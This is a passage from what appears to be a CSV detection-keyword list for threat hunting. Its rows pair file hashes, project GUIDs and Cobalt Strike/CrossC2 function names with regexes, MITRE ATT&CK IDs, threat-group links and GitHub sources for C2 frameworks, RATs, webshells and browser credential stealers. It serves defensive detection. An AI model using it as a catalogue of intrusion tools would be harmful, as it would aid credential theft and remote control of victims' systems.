"*CBAB0FE9-F4C0-49F2-90B1-7F34593F705A*",".{0,1000}CBAB0FE9\-F4C0\-49F2\-90B1\-7F34593F705A.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","37686"
"*cbaea921d56ea8c24330964c8b73ba77ceccd1691b80213399c18eb82c54b11a*",".{0,1000}cbaea921d56ea8c24330964c8b73ba77ceccd1691b80213399c18eb82c54b11a.{0,1000}","offensive_tool_keyword","Dispossessor","socks tools used by the ransomware group Dispossessor","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37688"
"*cbaf0210687d757f1633501c2706a4c7e58ce7eace047c9baeb720abc83e9528*",".{0,1000}cbaf0210687d757f1633501c2706a4c7e58ce7eace047c9baeb720abc83e9528.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37689"
"*cbbadc6ef65c597a7cd81e6f98758815d35ac0530367d87341dd0618b5c7359b*",".{0,1000}cbbadc6ef65c597a7cd81e6f98758815d35ac0530367d87341dd0618b5c7359b.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#filehash","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","37691"
"*cbbb2f474f0ca015a37d57ec856950db3ce62942c8dd737003a9cc8f7cf63c07*",".{0,1000}cbbb2f474f0ca015a37d57ec856950db3ce62942c8dd737003a9cc8f7cf63c07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37692"
"*cbc3576e68c1b71336ccdbd3872474fd7dff23932ae2dd4f310bf22551187281*",".{0,1000}cbc3576e68c1b71336ccdbd3872474fd7dff23932ae2dd4f310bf22551187281.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37693"
"*cbc4d8625c86cc011647a533bc6f8667bf16547ae42cf7e01a48259ca507ac8f*",".{0,1000}cbc4d8625c86cc011647a533bc6f8667bf16547ae42cf7e01a48259ca507ac8f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37694"
"*cbe090ee5a7210e39968ed958acbecdf0251eceb8e7b0f4acec6efb21e63025f*",".{0,1000}cbe090ee5a7210e39968ed958acbecdf0251eceb8e7b0f4acec6efb21e63025f.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","37696"
"*cbe60ddb0c22d6a5743901dd06d855958a68a90ab0820665acd1e7b53f0a9c71*",".{0,1000}cbe60ddb0c22d6a5743901dd06d855958a68a90ab0820665acd1e7b53f0a9c71.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","#filehash","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","37697"
"*cbec6150e83403631fe741f0c50e516170279645c246638b0148e1b87c0848e7*",".{0,1000}cbec6150e83403631fe741f0c50e516170279645c246638b0148e1b87c0848e7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","37698"
"*cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","cbeecb2981c75b8f066b1f04f19f2095bdcf22f19d0d3f1099b83963547c00cb","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","37699"
"*cbef865bf615c4848daf375557669dcadbd531b38f9335b11b411b3621b8a6dc*",".{0,1000}cbef865bf615c4848daf375557669dcadbd531b38f9335b11b411b3621b8a6dc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37700"
"*cbf03e162816e6ba6863355f82b4e9e9853f529d11aa95141fc59781496f8e65*",".{0,1000}cbf03e162816e6ba6863355f82b4e9e9853f529d11aa95141fc59781496f8e65.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#filehash","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","37701"
"*cbf0c66fd84a1f7f1adf764e887a1249afab4d475f652af4e534149ad97d1cce*",".{0,1000}cbf0c66fd84a1f7f1adf764e887a1249afab4d475f652af4e534149ad97d1cce.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37702"
"*cbfccaef2077858123b86e747227500370be60843d0f0c4b65a8a2ab644d707e*",".{0,1000}cbfccaef2077858123b86e747227500370be60843d0f0c4b65a8a2ab644d707e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37705"
"*cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7*",".{0,1000}cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37706"
"*cc07636703d3e6ee9a011ffa8730cabbe9d49453fac9eb8a428fee4c36621453*",".{0,1000}cc07636703d3e6ee9a011ffa8730cabbe9d49453fac9eb8a428fee4c36621453.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37708"
"*cc0ced090edf59964428ab7b16b9cf8ce57b8ee21e999ac05e7f4d5d52b5470c*",".{0,1000}cc0ced090edf59964428ab7b16b9cf8ce57b8ee21e999ac05e7f4d5d52b5470c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37710"
"*CC12258F-AF24-4773-A8E3-45D365BCBDE9*",".{0,1000}CC12258F\-AF24\-4773\-A8E3\-45D365BCBDE9.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#GUIDproject","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","37711"
"*CC127443-2519-4E04-8865-A6887658CDE5*",".{0,1000}CC127443\-2519\-4E04\-8865\-A6887658CDE5.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","#GUIDproject","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","37712"
"*cc16da8e0b3d5f3f107f25413a2f0b7c71cba43ba7013e68a269e1bd96c34b65*",".{0,1000}cc16da8e0b3d5f3f107f25413a2f0b7c71cba43ba7013e68a269e1bd96c34b65.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","37714"
"*cc19a3679601e440635849d43a38421ec3fff94013496911ef69b9c7d601572b*",".{0,1000}cc19a3679601e440635849d43a38421ec3fff94013496911ef69b9c7d601572b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","37715"
"*cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272*",".{0,1000}cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","37716"
"*cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272*",".{0,1000}cc19c785702eea660a1dd7cbf9e4fef80b41384e8bd6ce26b7229e0251f24272.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","37717"
"*cc2_keystrokes*",".{0,1000}cc2_keystrokes.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37719"
"*cc2_keystrokes_*",".{0,1000}cc2_keystrokes_.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37720"
"*cc2_mimipenguin.*",".{0,1000}cc2_mimipenguin\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","37721"
"*cc2_portscan*",".{0,1000}cc2_portscan.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37722"
"*cc2_portscan_*",".{0,1000}cc2_portscan_.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37723"
"*cc2_rebind_*_get_recv*",".{0,1000}cc2_rebind_.{0,1000}_get_recv.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37724"
"*cc2_rebind_*_get_send*",".{0,1000}cc2_rebind_.{0,1000}_get_send.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37725"
"*cc2_rebind_*_post_recv*",".{0,1000}cc2_rebind_.{0,1000}_post_recv.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37726"
"*cc2_rebind_*_post_send*",".{0,1000}cc2_rebind_.{0,1000}_post_send.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","37727"
"*cc2_udp_server*",".{0,1000}cc2_udp_server.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 